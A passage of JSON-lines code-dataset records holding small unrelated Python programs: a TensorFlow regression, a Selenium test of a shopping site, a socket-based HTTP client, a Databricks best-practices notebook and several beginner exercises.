{element} loaded!\")\n\nprint(\"__________________________________________\")\n","sub_path":"places/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"482681938","text":"#!/usr/bin/env python3\n\nimport argparse\n\nif __name__ == \"__main__\":\n # Argument Parsing\n parser = argparse.ArgumentParser(description=\"Print 'Hello World'\")\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s 2.0\")\n args = parser.parse_args()\n\n print(\"Hello World\")\n","sub_path":"hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48168900","text":"# Loading the required packages\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Function to normalize the input data(array form)\ndef Normalize(x):\n mean = np.mean(x)\n standard_deviation = np.std(x)\n X = (x - mean)/standard_deviation\n return X\n\n'''\nHere we are building the computational graph\n'''\n# Now we load the boston house price dataset using tensorflow contrib Datasets\n# Separate the data into X_train and Y_train\nboston_dataset = tf.contrib.learn.datasets.load_dataset('boston')\nprint(boston_dataset.data.shape)\n# By 5 means out of 13 columns(features) we are only taking one into consideration\nX_train , Y_train = boston_dataset.data[:,5] , boston_dataset.target\nprint(X_train.shape , Y_train.shape)\n# So we see we have 506 samples of training data\nX_train = Normalize(X_train)\nn_samples = len(X_train)\n\n# Placeholder for storing the training data\nX = tf.placeholder(tf.float32 , name = 'X')\nY = tf.placeholder(tf.float32 , name = 'Y')\n\n# Assigning weights and biases to 0\nw = tf.Variable(0.0 , name = 'weight')\nb = tf.Variable(0.0 , name = 'biases')\n\n# Linear Regression Model for prediction\ny_hat = X*w + b\n\n# Loss function\nloss = tf.square( Y - y_hat, name = 'loss')\n\n# Gradient descent optimiter for minimizing loss\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01).minimize(loss)\n\n# Initializing variables\ninit = tf.global_variables_initializer()\ntotal = []\n\n'''\nDone building the computational graph\n'''\n\n'''\nUse of zip\n\n# initializing list of players. \nplayers = [ \"Sachin\", \"Sehwag\", \"Gambhir\", \"Dravid\", \"Raina\" ] \n# initializing their scores \nscores = [100, 15, 17, 28, 43 ] \n# printing players and scores. 
\nfor pl, sc in zip(players, scores): \n print (\"Player : %s Score : %d\" %(pl, sc)) \nOutput:\n\nPlayer : Sachin Score : 100\nPlayer : Sehwag Score : 15\nPlayer : Gambhir Score : 17\nPlayer : Dravid Score : 28\nPlayer : Raina Score : 43\n'''\n\nno_of_epochs = 100\nwith tf.Session() as sess:\n # initializing the variables\n sess.run(init)\n # for visualization in tensorboard\n writer = tf.summary.FileWriter('graphs' , sess.graph)\n for i in range(no_of_epochs):\n total_loss = 0\n for x,y in zip(X_train , Y_train):\n # _ because we dont want to store optimizers value\n _ , l = sess.run([optimizer , loss] , feed_dict = {X : x , Y : y})\n # we are calculating total loss for all the sample of data going through them one by one\n # In multiple regression we multiply the data all at once in a matrix\n total_loss += l\n # we divide by n_samples we are going through each sample in above for loop and then adding the loss\n total.append(total_loss/n_samples)\n print('Epoch {0} : Loss {1}'.format(i , total_loss/n_samples))\n writer.close()\n # getting the value of weight and bias after 100 epochs\n w_value , b_value = sess.run([w , b])\n\nY_pred = X_train*w_value + b_value\nprint('done')\n\n# Plotting the result\nplt.plot(X_train, Y_train, 'bo', label='Real Data')\nplt.plot(X_train,Y_pred, 'r', label='Predicted Data')\nplt.legend()\nplt.show()\n\nplt.plot(total)\nplt.show()\n\n# Loss gets stuck at one value due to normalization comment it and see the results\n# Also see multiple regression example for clearer concept\n","sub_path":"Tensorflow Codes/LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407027689","text":"import time\r\nimport json\r\n\r\nimport pypyodbc\r\nfrom datetime import datetime\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.remote.webelement import WebElement\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions\r\nfrom selenium.webdriver.support.select import Select\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nimport pytest\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport webbrowser\r\n\r\n\r\n\r\nclass TestTrendyol():\r\n def setup_method(self, method):\r\n self.driver = webdriver.Firefox()\r\n self.vars = {}\r\n\r\n def teardown_method(self, method):\r\n self.driver.quit()\r\n\r\n def test_login(self):\r\n conn = pypyodbc.connect(\r\n \"Driver={SQL Server Native Client 11.0};\"\r\n \"Server=DESKTOP-I3V9S4O\\SQLEXPRESS01;\"\r\n \"Database=telefonrehber;\"\r\n \"Trusted_Connection=yes;\"\r\n )\r\n cursor = conn.cursor()\r\n datetime.now()\r\n sql = \"INSERT INTO testresults (Gerçekleştiren_Kişi, Tanım, Açıklama,Durum,Öncelik,dtarih) VALUES(?,?,?,?,?,?)\"\r\n wait = WebDriverWait(self.driver, 20)\r\n self.driver.get(\"https://www.trendyol.com\")\r\n\r\n wait.until(EC.element_to_be_clickable((By.CLASS_NAME, \"modal-close\"))).click()\r\n wait.until(EC.element_to_be_clickable((By.CLASS_NAME, \"close-button\"))).click()\r\n\r\n actualUrl = \"https://www.trendyol.com/\"\r\n expected = 
self.driver.current_url\r\n # self.assertEqual(actualUrl, expected)\r\n\r\n if (actualUrl == expected):\r\n print(\"Welcome\")\r\n values = (\"Tester1\", \"SiteyeGiris\", \"SiteyeGirisBasarili\", \"Basarili\", \"-\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Fail\")\r\n values = (\"Tester1\", \"SiteyeGiris\", \"SiteyeGirisBaşarisiz\", \"Basarisiz\", \"-\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n\r\n login: WebElement = self.driver.find_element_by_css_selector(\".account-user > .link-text\")\r\n login.click()\r\n username: WebElement = self.driver.find_element_by_id(\"login-email\")\r\n password: WebElement = self.driver.find_element_by_id(\"login-password-input\")\r\n\r\n username.send_keys(\"asdasdasdsefa@gmail.com\")\r\n password.send_keys(\"testhesabı00\")\r\n gir: WebElement = self.driver.find_element_by_xpath(\r\n \"//div[@id='login-register']/div[3]/div/form/button/span\").click()\r\n actualUrl1 = \"https://www.trendyol.com/giris?cb=https%3A%2F%2Fwww.trendyol.com%2Fbutik%2Fliste%2F2%2Ferkek\"\r\n expected1 = self.driver.current_url\r\n # self.assertEqual(actualUrl, expected)\r\n if (actualUrl1 == expected1):\r\n print(\"Giris Basarılı\")\r\n values = (\"Tester1\", \"ÜyeGiris\", \"ÜyeGirisBasarili\", \"Basarili\", \"Test1\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Giriş Başarısız.\")\r\n values = (\"Tester1\", \"ÜyeGiris\", \"ÜyeGirisBaşarisiz\", \"Basarisiz\", \"Test1\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n\r\n\r\n time.sleep(2)\r\n self.driver.find_element(By.CSS_SELECTOR, \".search-box\").send_keys(\"samsung s20\")\r\n time.sleep(2)\r\n self.driver.find_element(By.CSS_SELECTOR, \".search-icon\").click()\r\n time.sleep(2)\r\n\r\n actualUrl2 = \"https://www.trendyol.com/sr?q=samsung%20s20&qt=samsung%20s20&st=samsung%20s20&os=1\"\r\n\r\n expected2 = self.driver.current_url\r\n\r\n # self.assertEqual(actualUrl, expected)\r\n if (actualUrl2 == expected2):\r\n print(\"Doğru Ürün Araması\")\r\n values = (\"Tester1\", \"ÜrünArama\", \"Dogru Ürün Arandi\", \"Basarili\", \"Test2\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Yanlış Ürün Araması\")\r\n values = (\"Tester1\", \"ÜrünArama\", \"Ürün Aramasinda Hata\", \"Basarisiz\", \"Test2\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n\r\n\r\n time.sleep(5)\r\n self.driver.find_element(By.CSS_SELECTOR, \"[data-id='78348960']\").click()\r\n\r\n select = Select(self.driver.find_element_by_css_selector('select'))\r\n time.sleep(2)\r\n select.select_by_value('PRICE_BY_ASC')\r\n time.sleep(2)\r\n actualUrl3 = \"https://www.trendyol.com/sr?q=samsung+s20&qt=samsung+s20&st=samsung+s20&sst=PRICE_BY_ASC\"\r\n expected3 = self.driver.current_url\r\n\r\n # self.assertEqual(actualUrl, expected)\r\n if (actualUrl3 == expected3):\r\n print(\"Ürünler doğru sıralandı\")\r\n values = (\"Tester1\", \"ÜrünSiralama\", \"Ürünler Dogru Siralandi\", \"Basarili\", \"Test3\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Ürünler yanlış sıralandı\")\r\n values = (\"Tester1\", \"ÜrünSiralama\", \"Ürünler Yanlis Siralandi\", \"Basarisiz\", \"Test3\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n time.sleep(2)\r\n\r\n self.driver.find_element(By.CSS_SELECTOR, \"[data-id='52681989']\").click()\r\n time.sleep(2)\r\n tab_list = self.driver.window_handles\r\n 
self.driver.switch_to.window(tab_list[1])\r\n        actualUrl4 = \"https://www.trendyol.com/samsung/m4025-d204-drum-unitesi-chip-p-52681989?boutiqueId=61&merchantId=198613\"\r\n        expected4 = self.driver.current_url\r\n\r\n        # self.assertEqual(actualUrl, expected)\r\n        if (actualUrl4 == expected4):\r\n            print(\"Doğru Ürün Seçildi\")\r\n            values = (\"Tester1\", \"ÜrünSecim\", \"Ürün Dogru Secildi\", \"Basarili\", \"Test4\", datetime.now())\r\n            cursor.execute(sql, values)\r\n            conn.commit()\r\n        else:\r\n            print(\"Yanlış Ürün Seçildi\")\r\n            values = (\"Tester1\", \"ÜrünSecim\", \"Ürün Yanlıs Secildi\", \"Basarisiz\", \"Test4\", datetime.now())\r\n            cursor.execute(sql, values)\r\n            conn.commit()\r\n        time.sleep(2)\r\n        self.driver.find_element_by_class_name(\"add-to-basket\").click()\r\n\r\n        time.sleep(2)\r\n        sepet: WebElement = self.driver.find_element_by_css_selector(\".account-basket > .link-text\")\r\n        sepet.click()\r\n        time.sleep(2)\r\n        actualUrl5 = \"https://www.trendyol.com/sepet\"\r\n        expected5 = self.driver.current_url\r\n        # self.assertEqual(actualUrl, expected)\r\n        if (actualUrl5 == expected5):\r\n            print(\"Ürün Başarıyla Sepete Eklendi\")\r\n            values = (\"Tester1\", \"Sepete Ekle\", \"Ürün Sepete Basariyla Eklendi\", \"Basarili\", \"Test5\", datetime.now())\r\n            cursor.execute(sql, values)\r\n            conn.commit()\r\n        else:\r\n            print(\"Ürün Sepete Eklenemedi\")\r\n            values = (\"Tester1\", \"Sepete Ekle\", \"Ürün Sepete Eklenemedi\", \"Basarisiz\", \"Test5\", datetime.now())\r\n            cursor.execute(sql, values)\r\n            conn.commit()\r\n\r\n        select_employee = \"SELECT * FROM testresults\"\r\n        cursor = conn.cursor()\r\n        cursor.execute(select_employee)\r\n        result = cursor.fetchall()\r\n\r\n        p = []\r\n        tbl = \"<table><tr><th>ID</th><th>GerçeklestirenKisi</th><th>Tanim</th><th>Aciklama</th><th>Durum</th><th>Oncelik</th><th>dTarih</th></tr>\"\r\n        p.append(tbl)\r\n\r\n        for row in result:\r\n            a = \"<tr><td>%s</td>\"%row[0]\r\n            p.append(a)\r\n            b = \"<td>%s</td>\"%row[1]\r\n            p.append(b)\r\n            c = \"<td>%s</td>\"%row[2]\r\n            p.append(c)\r\n            d = \"<td>%s</td>\"%row[3]\r\n            p.append(d)\r\n            e = \"<td>%s</td>\"%row[4]\r\n            p.append(e)\r\n            f = \"<td>%s</td>\"%row[5]\r\n            p.append(f)\r\n            g = \"<td>%s</td></tr>\"%row[6]\r\n            p.append(g)\r\n\r\n        contents = '''\r\n        <html>\r\n        <head>\r\n        <title>\r\n        Python Webbrowser\r\n        </title>\r\n        </head>\r\n        <body>\r\n        %s
\r\n        </table>\r\n        </body>\r\n        </html>\r\n        ''' % (p)\r\n        filename = 'webbrowser.html'\r\n        main(contents, filename)\r\n        webbrowser.open(filename)\r\n\r\ndef main(contents, filename):\r\n    output = open(filename, \"w\")\r\n    output.write(contents)\r\n    output.close()\r\n\r\n\r\n","sub_path":"Trendyol.py","file_name":"Trendyol.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421320044","text":"from Var import *\n\nclass ow :\n    def __init__(self,_name,_posX,_posY):\n        self._name = _name\n        self._posX = _posX\n        self._posY = _posY\n\n        hero = pygame.image.load(\"icons/\"+_name+\".png\")\n        hero = hero.convert_alpha()\n        screen.blit(hero, (_posX, _posY))\n\n\n","sub_path":"Overwatch/Function.py","file_name":"Function.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"6522393","text":"import numpy as np\nimport math\nfrom numba import jit\n\n@jit\ndef PSNR(noise, original):\n\theight = original.shape[0]\n\twidth = original.shape[1]\n\t# print(noise.shape, original.shape)\n\tMSE = 0\n\tfor i in range(height):\n\t\tfor j in range(width):\n\t\t\tMSE += math.pow(int(noise[i][j]) - int(original[i][j]), 2)\n\tMSE /= (height * width)\n\treturn (10 * math.log(255 * 255 / MSE, 10))\n","sub_path":"Final Project/PSNR.py","file_name":"PSNR.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"140502139","text":"# Databricks notebook source\n# MAGIC %md ## Notebook Best Practices\n# MAGIC \n# MAGIC A list of things to consider when creating notebooks for prototyping or production.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC _Any fool can write code that a computer can understand. Good programmers write code that humans can understand_ - Kent Beck, 1999\n# MAGIC \n# MAGIC _Any fool can write code that a computer can understand. Good **data engineers and scientists** write code that humans can understand_ - Anonymous, 2018\n\n# COMMAND ----------\n\n# MAGIC %md #### Principles\n# MAGIC \n# MAGIC * First make it **Work**\n# MAGIC * Then make it **Right**\n# MAGIC * Then make it **Fast**, **Small** and **Maintainable**\n\n# COMMAND ----------\n\n# MAGIC %md #### 1. Naming Good and Bad\n\n# COMMAND ----------\n\ninsurance_claims_data = spark.read.parquet(\"dbfs:/FileStore/databricks-abhinav/insurance/claims\")\n\n# Use meaningful, contextual, searchable names for your dataframes, variables etc.\n\n# COMMAND ----------\n\n# MAGIC %md #### 2. 
Readable code and comments\n\n# COMMAND ----------\n\n# DBTITLE 1,Specify the schema for insurance claims data\nfrom pyspark.sql.types import *\n\ninsurance_claims_schema = (StructType().\n add(\"months_as_customer\", IntegerType()).add(\"age\", IntegerType()).\n add(\"policy_number\", IntegerType()).add(\"policy_bind_date\", StringType()).\n add(\"policy_state\", StringType()).add(\"policy_csl\", StringType()).\n add(\"policy_deductible\", IntegerType()).add(\"policy_annual_premium\", DoubleType()).\n add(\"umbrella_limit\", IntegerType()).add(\"insured_zip\", IntegerType()).\n add(\"insured_sex\", StringType()).add(\"insured_education_level\", StringType()).\n add(\"insured_occupation\", StringType()).add(\"insured_hobbies\", StringType()).\n add(\"insured_relationship\", StringType()).add(\"capital_gains\", IntegerType()).\n add(\"capital_loss\", IntegerType()).add(\"incident_date\", StringType()).\n add(\"incident_type\", StringType()).add(\"collision_type\", StringType()).\n add(\"incident_severity\", StringType()).add(\"authorities_contacted\", StringType()).\n add(\"incident_state\", StringType()).add(\"incident_city\", StringType()).\n add(\"incident_location\", StringType()).add(\"incident_hour_of_the_day\", IntegerType()).\n add(\"number_of_vehicles_involved\", IntegerType()).add(\"property_damage\", StringType()).\n add(\"bodily_injuries\", IntegerType()).add(\"witnesses\", IntegerType()).\n add(\"police_report_available_\", StringType()).add(\"total_claim_amount\", IntegerType()).\n add(\"injury_claim\", IntegerType()).add(\"property_claim\", IntegerType()).\n add(\"vehicle_claim\", IntegerType()).add(\"auto_make\", StringType()).\n add(\"auto_model\", StringType()).add(\"auto_year\", IntegerType()).\n add(\"class_label\", StringType())\n )\n\n# COMMAND ----------\n\n# MAGIC %scala\n# MAGIC \n# MAGIC val r = 10\n\n# COMMAND ----------\n\n# DBTITLE 1,Extract claims data into dataframe and display\ninsurance_claims_data_raw = (spark.read.csv(\"dbfs:/FileStore/tables/insurance_claims.csv\", \n schema=insurance_claims_schema, header=True, \n ignoreLeadingWhiteSpace=True, \n ignoreTrailingWhiteSpace=True,\n nullValue='?'))\n\ninsurance_claims_data_filled = insurance_claims_data_raw.na.fill({'property_damage': 'NA', \n 'police_report_available_': 'NA', \n \"collision_type\": 'NA'})\n\ndisplay(insurance_claims_data_filled)\n\n# COMMAND ----------\n\npd = spark.sql(\"select * from adults\")\ndisplay(pd)\n\n# COMMAND ----------\n\n# MAGIC %md #### 3. 
Single Responsibility/Cohesion and Interface Segregation\n\n# COMMAND ----------\n\n# DBTITLE 1,Package cell with a super-loaded trait and implementations\n# MAGIC %scala\n# MAGIC \n# MAGIC package com.databricks.abhinav.messy\n# MAGIC \n# MAGIC trait ThisIsAnInterface {\n# MAGIC def doThisOneThing:Double\n# MAGIC def doThisSecondThing:Double\n# MAGIC def doThisTooPlease:String\n# MAGIC def mightDoThisAsWellWhenWeAreHere:String\n# MAGIC def whatTheHeckWhoCares:Integer\n# MAGIC }\n# MAGIC \n# MAGIC class ThisIsClassOne(size:Double) extends ThisIsAnInterface {\n# MAGIC def doThisOneThing:Double = { size * size }\n# MAGIC def doThisSecondThing:Double = { size * size * size }\n# MAGIC def doThisTooPlease:String = \"Probably makes sense\"\n# MAGIC def mightDoThisAsWellWhenWeAreHere:String = throw new UnsupportedOperationException\n# MAGIC def whatTheHeckWhoCares:Integer = throw new UnsupportedOperationException\n# MAGIC }\n# MAGIC \n# MAGIC class ThisIsClassTwo(message:String) extends ThisIsAnInterface {\n# MAGIC def doThisOneThing:Double = throw new UnsupportedOperationException\n# MAGIC def doThisSecondThing:Double = throw new UnsupportedOperationException\n# MAGIC def doThisTooPlease:String = \"Probably makes sense here too\"\n# MAGIC def mightDoThisAsWellWhenWeAreHere:String = \"Replaying the \" + message\n# MAGIC def whatTheHeckWhoCares:Integer = message.length\n# MAGIC }\n\n# COMMAND ----------\n\n# DBTITLE 1,Package cell respecting SOLID principles\n# MAGIC %scala\n# MAGIC \n# MAGIC package com.databricks.abhinav.better\n# MAGIC \n# MAGIC trait ThisIsInterfaceOne {\n# MAGIC def doThisOneThing:Double\n# MAGIC def doThisSecondThing:Double\n# MAGIC }\n# MAGIC \n# MAGIC trait ThisIsInterfaceTwo {\n# MAGIC def thisMakesSense:String\n# MAGIC }\n# MAGIC \n# MAGIC trait ThisIsInterfaceThree {\n# MAGIC def doThisSpecificThing:String\n# MAGIC def doThisSecondSpecificThing:Integer\n# MAGIC }\n# MAGIC \n# MAGIC class ThisIsClassOne(size:Double) extends ThisIsInterfaceOne with ThisIsInterfaceTwo {\n# MAGIC def doThisOneThing:Double = { size * size }\n# MAGIC def doThisSecondThing:Double = { size * size * size }\n# MAGIC def thisMakesSense:String = \"Probably makes sense\"\n# MAGIC }\n# MAGIC \n# MAGIC class ThisIsClassTwo(message:String) extends ThisIsInterfaceThree with ThisIsInterfaceTwo {\n# MAGIC def doThisSpecificThing:String = \"Replaying the \" + message\n# MAGIC def doThisSecondSpecificThing:Integer = message.length\n# MAGIC def thisMakesSense:String = \"Probably makes sense here too\"\n# MAGIC }\n\n# COMMAND ----------\n\n# MAGIC %md #### 4. Reuse code, keep it small, and use Notebook workflows\n\n# COMMAND ----------\n\n# DBTITLE 1,Read limited data from insurance claims table\ninsurance_claims_data = spark.sql(\"SELECT * \\\n FROM INSURANCE_DB.INSURANCE_CLAIMS_TBL \\\n LIMIT 1000\")\n\n# COMMAND ----------\n\n# MAGIC %md #### 5. 
Unit test your code\n\n# COMMAND ----------\n\n# DBTITLE 1,Read limited data from insurance claims table and validate row count\ninsurance_claims_data = spark.sql(\"SELECT * \\\n                                  FROM INSURANCE_DB.INSURANCE_CLAIMS_TBL \\\n                                  LIMIT 1000\")\n\nassert insurance_claims_data.count() == 4000\n\n# COMMAND ----------\n\ndbutils.notebook.exit(\"SUCCESS\")\n\n# COMMAND ----------\n\nprint(\"test6\")","sub_path":"notebooks/Users/lei.pan@databricks.com/CICDPipeline/Staging/notebook_test.py","file_name":"notebook_test.py","file_ext":"py","file_size_in_byte":7120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52649980","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n    import sys\n    import calculator_1 as calc\n    operators = [\"+\", \"-\", \"*\", \"/\"]\n    x = sys.argv\n    if len(x) != 4:\n        (print(\"{}\"\n               .format(\"Usage: ./100-my_calculator.py <a> <operator> <b>\")))\n        exit(1)\n    if not x[2] in operators:\n        (print(\"{}\"\n               .format(\"Unknown operator. Available operators: +, -, * and /\")))\n        exit(1)\n    a = int(x[1])\n    b = int(x[3])\n    op = x[2]\n    result = (calc.add(a, b)\n              if op is \"+\" else calc.sub(a, b)\n              if op is \"-\" else calc.mul(a, b)\n              if op is \"*\" else calc.div(a, b)\n              if op is \"/\" else 0)\n    print(\"{} {} {} = {}\".format(a, op, b, result))\n","sub_path":"0x02-python-import_modules/100-my_calculator.py","file_name":"100-my_calculator.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"298673012","text":"import math\n\n#Cost of down payment\nportion_down_payment = 0.25\n#Savings increases each month by monthly salary + investment\ncurrent_savings = 0.0\n#Rate of investment return\nr = 0.04\n\n#Inputs\n\n#Total annual salary\nannual_salary = float(input(\"Enter your annual salary: \"))\n#Portion of salary saved each month for down payment\nportion_saved = float(input(\"Enter the portion of your salary to be saved, as a decimal: \"))\n#Cost of your dream home\ntotal_cost = float(input(\"Enter the cost of your dream home: \"))\n\ndown_payment = total_cost*portion_down_payment\nmonths = 0\n\nwhile current_savings < down_payment:\n    current_savings = current_savings + portion_saved*(annual_salary/12) + (r/12)*(current_savings)\n    months += 1\n\nprint(\"Number of months: \" + str(months))\n\n\n","sub_path":"Problem set 1/ps1a.py","file_name":"ps1a.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"549612027","text":"import socket\nimport ssl\n\n\ndef log(*args, **kwargs):\n\tprint(\"Log: \", *args, **kwargs)\n\n\ndef parsed_url(url):\n\t\"\"\"\n    Parse the url and return (protocol host port path)\n    Sometimes a function simply cannot be made pretty; all you can do is write it out plainly\n    \"\"\"\n\t# check the protocol\n\tprotocol = 'http'\n\tif url[:7] == 'http://':\n\t\tu = url.split('://')[1]\n\telif url[:8] == 'https://':\n\t\tprotocol = 'https'\n\t\tu = url.split('://')[1]\n\telse:\n\t\t# locate '://', then slice at the position of the first /\n\t\tu = url\n\n\t# check the default path\n\ti = u.find('/')\n\tif i == -1:\n\t\thost = u\n\t\tpath = '/'\n\telse:\n\t\thost = u[:i]\n\t\tpath = u[i:]\n\n\t# check the port\n\tport_dict = {\n\t\t'http': 80,\n\t\t'https': 443,\n\t}\n\t# default port\n\tport = port_dict[protocol]\n\tif host.find(':') != -1:\n\t\th = host.split(':')\n\t\thost = h[0]\n\t\tport = int(h[1])\n\n\treturn protocol, host, port, path\n\n\ndef socket_by_protocol(protocol):\n\t\"\"\"\n    Return a socket instance according to the protocol\n    \"\"\"\n\tif protocol == 'http':\n\t\ts = socket.socket()\n\telse:\n\t\t# the HTTPS protocol needs ssl.wrap_socket
 to wrap the raw socket\n\t\t# apart from that there is no difference\n\t\ts = ssl.wrap_socket(socket.socket())\n\treturn s\n\ndef response_by_socket(s):\n\t\"\"\"\n    The parameter is a socket instance\n    Return all the data read from this socket\n    \"\"\"\n\tresponse = b''\n\tbuffer_size = 1024\n\twhile True:\n\t\tr = s.recv(buffer_size)\n\t\tif len(r) == 0:\n\t\t\tbreak\n\t\tresponse += r\n\treturn response\n\n\ndef parsed_response(r):\n\t\"\"\"\n    Parse the response into status code, headers and body and return them\n    the status code is an int\n    headers is a dict\n    body is a str\n    \"\"\"\n\theader, body = r.split('\\r\\n\\r\\n', 1)\n\th = header.split('\\r\\n')\n\tstatus_code = h[0].split()[1]\n\tstatus_code = int(status_code)\n\n\theaders = {}\n\tfor line in h[1:]:\n\t\tk, v = line.split(': ')\n\t\theaders[k] = v\n\treturn status_code, headers, body\n\n\ndef header_from_dict(headers):\n\t'''\n    headers is a dict\n    for example, given\n    {\n    \t'Content-Type': 'text/html',\n        'Content-Length': 127,\n    }\n    return the following str\n    'Content-Type: text/html\\r\\nContent-Length: 127\\r\\n'\n    '''\n\tq = \"\"\n\tfor key, value in headers.items():\n\t\tq += key + \": \" + value + \"\\r\\n\"\n\n\treturn q\n\n\ndef get(url, query):\n\tprotocol, host, port, path = parsed_url(url)\n\tlog(\"visiting:\", protocol, host, port, path)\n\n\ts = socket_by_protocol(protocol)\n\ts.connect((host, port))  # connect to the network: visit the site\n\n\theaders = header_from_dict(query)\n\thttp_request = 'GET {} HTTP/1.1\\r\\nhost: {}\\r\\nConnection: close\\r\\n{}\\r\\n'.format(path, host, headers)\n\trequest = http_request.encode(\"utf-8\")\n\tlog(\"*** user starts visiting: {}\".format(url))\n\tlog(\"*** user sends request: [{}]\".format(request))\n\n\ts.send(request)\n\n\tresponse = response_by_socket(s)\n\tr = response.decode(\"utf-8\")\n\tlog(\"response\", r)\n\tstatus_code, headers, body = parsed_response(r)\n\tif status_code == 301:\n\t\turl = headers['Location']\n\t\treturn get(url, query)\n\treturn status_code, headers, body\n\n\nif __name__ == \"__main__\":\n\turl = 'https://movie.douban.com/top250'\n\tquery = {\n\t\t'Accept': 'text/html',\n\t\t'Accept - Language': 'zh - CN, zh;q = 0.9, en;q = 0.8',\n\t}\n\tstatus_code, headers, body = get(url, query)\n","sub_path":"原理性Demo/pythonWeb/web2/my/cliect.py","file_name":"cliect.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"289454803","text":"from stack import Stack\nfrom builders import RandomStackBuilder, ConcreteStackBuilder\n\n\ndef fight(stack1, stack2):\n    damage1 = stack1._number * stack1._damage * (stack1._attack - stack2._defence)\n    if damage1 < 0:\n        damage1 = 0\n    stack2.get_damage(damage1)\n    if stack2._is_dead:\n        return\n    else:\n        if stack1._retaliation:\n            damage2 = stack2._number * stack2._damage * (stack2._attack - stack1._defence)\n            if damage2 < 0:\n                damage2 = 0\n            stack1.get_damage(damage2)\n\n\ndef check_alive(stack1, stack2):\n    if stack1._is_dead:\n        print(\"Second stack won this battle\")\n        return False\n\n    if stack2._is_dead:\n        print(\"First stack won this battle\")\n        return False\n\n    return True\n\n\ndef fight_to_death(stack1: Stack, stack2: Stack):\n\n    if stack1._is_dead or stack2._is_dead:\n        print(\"I'm really sorry, but some of these creatures are dead\")\n    \n    else:\n        while True:\n            fight(stack1, stack2)\n            if not check_alive(stack1, stack2):\n                break\n\n            fight(stack2, stack1)\n            if not check_alive(stack1, stack2):\n                break\n\n\nconcrete_builder = ConcreteStackBuilder()\nconcrete_builder.set_attack(20)\nconcrete_builder.set_defence(20)\nconcrete_builder.set_damage(50)\nconcrete_builder.set_max_health(200)\nconcrete_builder.set_number(3)\n\nrandom_builder = 
RandomStackBuilder()\nrandom_builder.set_attack()\nrandom_builder.set_defence()\nrandom_builder.set_damage()\nrandom_builder.set_max_health()\nrandom_builder.set_number()\nrandom_builder.make_no_retaliation()\n\nangels = concrete_builder.get_stack()\nrandom_creatures = random_builder.get_stack()\n\nfight_to_death(angels, random_creatures)\n \n","sub_path":"build_and_fight.py","file_name":"build_and_fight.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"493812011","text":"import cachey\nimport uvicorn\nimport xarray as xr\nfrom fastapi import FastAPI\n\nfrom .dependencies import get_cache, get_dataset\nfrom .routers import base_router, common_router, zarr_router\nfrom .utils.api import check_route_conflicts, normalize_app_routers\n\n\n@xr.register_dataset_accessor('rest')\nclass RestAccessor:\n \"\"\"REST API Accessor\n\n Parameters\n ----------\n xarray_obj : Dataset\n Dataset object to be served through the REST API.\n\n Notes\n -----\n When using this as an accessor on an Xarray.Dataset, options are set via\n the ``RestAccessor.__call__()`` method.\n\n \"\"\"\n\n def __init__(self, xarray_obj):\n\n self._obj = xarray_obj\n\n self._app = None\n self._app_kws = {}\n self._app_routers = [\n (common_router, {}),\n (base_router, {'tags': ['info']}),\n (zarr_router, {'tags': ['zarr']}),\n ]\n\n self._cache = None\n self._cache_kws = {'available_bytes': 1e6}\n\n self._initialized = False\n\n def __call__(self, routers=None, cache_kws=None, app_kws=None):\n \"\"\"Initialize this accessor by setting optional configuration values.\n\n Parameters\n ----------\n routers : list, optional\n A list of :class:`fastapi.APIRouter` instances to include in the\n fastAPI application. 
